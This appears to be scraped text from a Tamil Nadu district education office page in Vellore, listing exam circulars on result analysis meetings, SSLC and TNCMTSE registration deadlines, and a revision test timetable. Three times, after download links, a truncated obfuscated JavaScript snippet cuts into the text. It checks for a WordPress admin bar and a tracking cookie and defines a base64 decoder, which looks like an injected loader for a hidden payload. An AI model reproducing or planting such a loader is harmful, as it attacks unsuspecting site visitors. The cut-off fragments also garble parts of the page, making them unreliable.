EXAMINATION

சுற்றறிக்கை

டிசம்பர் -2025 அரையாண்டுத் தேர்ச்சி விழுக்காடு முதுகலை ஆசிரியர்களுக்கான பகுப்பாய்வுக் கூட்டம் நாளை (21.01.2026) அன்று ஒருங்கிணைந்த பள்ளிக்கல்வி கூட்ட அரங்கில் (SSA ) பிற்பகல் 1.00 மணியளவில் நடைபெறவுள்ளது . எனவே இத்துடன் இணைப்பில் காணும் முதுகலை ஆசிரியர்களை தேர்ச்சி விழுக்காடு பகுப்பாய்வுக் கூட்டத்தில் தவறாமல் கலந்து கொள்ள ஏதுவாக விடுவித்து அனுப்பிட சார்ந்த பள்ளிகளின் தலைமை ஆசிரியர்கள் கேட்டுக்கொள்ளப்படுகிறார்கள் . குறிப்பு : இத்துடன் இணைப்பில் காணும் முதுகலை ஆசிரியர்கள் கட்டாயம் கீழ்காணும் விவரங்களை தலைமை ஆசிரியரிடம் ஒரு நகல் கொடுத்து அதன் பிரதியினை கூட்டத்தில் சமர்பிக்க வேண்டும் எனத் தெரிவிக்கப்படுகிறது. Teacher Action Plan for improving results subject wise mark Register - copy list of low performing Students RESULT ANALYSIS MEET 21.01.2026 AT SSADow

தேர்வுகள்- 2025- 2026-ஆம் கல்வியாண்டிற்கான பத்தாம் வகுப்பு பொதுத் தேர்வு பதிவேற்றம் செய்தல், பெயர்ப்பட்டியல் தயாரிப்பு பணிகளை நிறைவு செய்தல் மற்றும் தேர்வுக்கட்டணம், TML கட்டணம் செலுத்துவதற்கு கூடுதல் கால அவகாசம் வழங்குதல் – பள்ளிகளுக்கு தெரிவித்தல் -தொடர்பாக.

SSLC NR 2026 NR DATE EXTENSION 20 1 2026Download (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');while(i

தேர்வுகள் – தமிழ்நாடு முதலமைச்சரின் திறமைத் தேடல் தேர்வு (TNCMTSE) ஜனவரி -2026  பள்ளி மாணவர்களின் விவரங்கள் ஆன்லைனில் பதிவேற்றம் செய்தல் கால அவகாசம் நீட்டித்தல் – தொடர்பாக

date extend proccedingDownload TNCMTSE APPLIED & NOT APPLIED SCHOOL LISTDownload பெறுநர்:  அனைத்து அரசு/நகரவை /ஆதிதிராவிடர் நல உயர் மற்றும்  மேல்நிலைப்பள்ளி தலைமை ஆசிரியர்கள், வேலூர் மாவட்டம்.  நகல்: மாவட்டக் கல்வி அலுவலர்(இடைநிலை ) அவர்களுக்கு தகவலுக்காகவும் தொடர் நடவடிக்கைக்காகவும் தெரிவிக்கலாகிறது.    மாவட்டக் கல்வி அலுவலர்(தனியார் பள்ளிகள் /தொடக்கக்கல்வி  ) அவர்களுக்கு தகவலுக்காக தெரிவிக்கலாகிறது.    (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(/[^

தேர்வுகள் –வேலூர் மாவட்டம் – 10 மற்றும் 12ம் வகுப்பு பொதுத்தேர்வுகளில் தொடர்ந்து மூன்று ஆண்டுகள் 100% தேர்ச்சி வழங்கிய ஆசிரியர்கள் விவரங்கள் கோருதல் –தொடர்பாக

அனைத்து அரசு மற்றும் நிதியுதவிப்பள்ளி தலைமையாசிரியர்கள்/ ஆசிரியர்களுக்கு,                        10 மற்றும் 12ம் வகுப்பு பொதுத்தேர்வுகளில் தொடர்ந்து மூன்று ஆண்டுகள் (2022-2023 ,2023-2024 ,2024-20525)  100% தேர்ச்சி வழங்கிய ஆசிரியர்களின் விவரங்களை இத்துடன் இணைப்பில் காணும் Google Sheet –ல் உடன் நாளை 08.01.2026 (வியாழக்கிழமை ) காலை 11.00 மணிக்குள் பதிவுகள் மேற்கொள்ள  கேட்டுக்கொள்ளப்படுகிறார்கள். இணைப்பு : https://docs.google.com/spreadsheets/d/1XaTogh8a0qKqS0oOccOe83X80vUfCj9TUVKRkkM0p9k/edit?usp=sharing                                                 

தேர்வுகள் – தமிழ்நாடு முதலமைச்சரின் திறமைத் தேடல் தேர்வு (TNCMTSE) ஜனவரி -2026  பள்ளி மாணவர்களின் விவரங்கள் ஆன்லைனில் பதிவேற்றம் செய்தல் கால அவகாசம் நீட்டித்தல் – தொடர்பாக

DATE EXTEND PROCEEDING 08.01.2026Download TNCMTSE APPLIED & NOT APPLIED SCHOOL LISTDownload            //ஒம். //                                                                                       முதன்மைக் கல்வி அலுவலர்,          

சுற்றறிக்கை

டிசம்பர் -2025 அரையாண்டுத் தேர்வுகள் முடிவுற்று விடைத்தாட்கள் திருத்திய உடன் தேர்ச்சி சதவிகிதம் சார்பான விவரங்கள் இத்துடன் இணைப்பில் காணும் Google sheet -ல் 05.01.2026  அன்று பிற்பகல் 1.00 மணிக்குள் பதிவுகள் மேற்கொள்ள அனைத்து அரசு /நகரவை / ஆதிதிராவிடர் நல /  அரசு நிதியுதவி உயர் / மேல்நிலைப்பள்ளிகளின் தலைமையாசிரியர்கள்  கேட்டுக்கொள்ளப்படுகிறார்கள் .  மேலும் டிசம்பர் -2025 பத்தாம் வகுப்பு ,மேல்நிலை இரண்டமாண்டு அரையாண்டுத் தேர்வில்  தோல்வியுற்ற மற்றும் வருகை புரியாத மாணவர்களின் விவரங்களை இத்துடன் இணைப்பில் காணும் EXCEL படிவத்தில் பூர்த்தி செய்து 05.01.2026  பிற்பகல் 3.00 மணிக்குள் examvellore2023@gmail.com என்ற மின்னஞ்சல் முகவரிக்கு அனுப்பிட அனைத்து அரசு /நகரவை / ஆதிதிராவிடர் நல /  அரசு நிதியுதவி உயர் / மேல்நிலைப்பள்ளிகளின் தலைமையாசிரியர்களுக்கு தெரிவிக்

தேர்வுகள் – தமிழ்நாடு முதலமைச்சரின் திறமைத் தேடல் தேர்வு (TNCMTSE) ஜனவரி -2026  பள்ளி மாணவர்களின் விவரங்கள் ஆன்லைனில் பதிவேற்றம் செய்தல் கால அவகாசம் நீட்டித்தல் – தொடர்பாக

date extend proceedingDownload TNCMTSE APPLIED & NOT APPLIED SCHOOL LIST AS ON 03.01.2026 9 PM REPORTDownload            //ஒம். //                                                                                       முதன்மைக் கல்வி அலுவலர்,      &nbs

தேர்வுகள் –வேலூர் மாவட்டம்-மார்ச்/ஏப்ரல் -2026 இடைநிலை மற்றும் மேல்நிலை பொதுத் தேர்வுகள் –பள்ளிகளில் பணிபுரியும் ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாதோர் விவரம்(EBS படிவம்) பணியாளர்களின் விவரங்கள்  – பள்ளித் தலைமை ஆசிரியர்கள் –சரிப்பார்த்தல் –  தொடர்பாக

 அனைத்து அரசு / நகரவை /அரசு நிதியுதவி  /ஆதிதிராவிடர் நல உயர் மற்றும் மேல்நிலைப்பள்ளி தலைமையாசிரியர்கள் கவனத்திற்கு நடைபெறவிருக்கும் மார்ச் /ஏப்ரல் -2026  இடைநிலை மற்றும் மேல்நிலை பொதுத்தேர்வுகள் சார்பாக , பணிபுரியும் அனைத்து ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாத பணியாளர்களின் விவரங்கள் வேலூர் மாவட்ட முதன்மைக் கல்வி அலுவலக இணையதளம் மூலும் பெறப்பட்டது. பெறப்பட்ட விவரங்கள் 12.12.2025 அன்று சுற்றறிக்கை அனுப்பிவைக்கப்படுகிறது.                   மேலும் இணைப்பில் தங்கள் பள்ளிகளில் பணிபுரியும் தலைமை ஆசிரியர் /ஆசிரியர்கள் மற்றும் ஆசிரியரல்லாதோர் விவரங்களை சரிபார்த்து எவர் பெயரும் விடுபடாமல் அனைத்து பதிவுகளும் சரியாக உள்ளது எனவும் அல்லது திருத்தங்கள் இருப்பின் திருத்தங்கள் மேற்கொண்டு  &nbs

தேர்வுகள் –வேலூர் மாவட்டம் –2025-2026 மேல்நிலை இரண்டாம் ஆண்டு மேல்நிலை முதலாமாண்டு (Arrear) பொதுத் தேர்வு – மாணவர்களது பெயர்ப்பட்டியலில் திருத்தங்கள் மேற்கொள்ளுதல் கால அவகாசம் வழங்குதல் -சார்பு.

nominal roll correction & deletion & additionDownload                           //ஓம். //                                                                             முதன்மைக்கல்விஅலுவலர்                  

தேர்வுகள் – வேலூர் மாவட்டம் – 2025-2026 -ம் கல்வியாண்டில் பள்ளிகளில் பயிலும் பத்தாம் வகுப்பு, மேல்நிலை முதலாம் ஆண்டு மற்றும்   இரண்டாம் ஆண்டு மாணவர்களுக்கான முதல் திருப்புதல் தேர்வுகள் தொடர்பாக தேர்வுக்கால அட்டவணை – தலைமையசிரியர்களுக்கு –   தெரிவித்தல் – சார்பு.

4379 FIRST REVISION TESTDownload FIRST REVISION - EXAM-2025-2026_ TIME TABLE 07.01Download https://docs.google.com/spreadsheets/d/1bz0a8nUgwqGAzpgJH9XX6V6zayuv5ZHxSCUgdUYzp94/edit?usp=sharing  //ஓம். // முதன்மைக் கல்வி அலுவலர், வேலூர்.   பெறுநர் அனைத்துவகை உயர்/மேல்நிலைப் பள்ளி தலைமை ஆசிரியர்கள் மற்றும்    மெட்ரிக் பள்ளி முதல்வர்கள். நகல்:- மாவட்டக் கல்வி அலுவலர்(இடைநிலை /தனியார்), வேலூர் அவர்களுக்கு தகவலுக்காகவுடம தொடர் நடவடிக்கைக்காகவும் அனுப்பலாகிறது. மாவட்டக் கல்வி அலுவலர்(தொடக்கக்கல்வி )அவர்களுக்கு தகவலின் பொருட்டு அனுப்பப்படுகிறது. வேலூர் மாவட்ட ஆட்சித் தலைவர் அவர்களுக்கு தகவலின் பொருட்டு அனுப்பிவைக்கப்படுகிறது. (function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Dat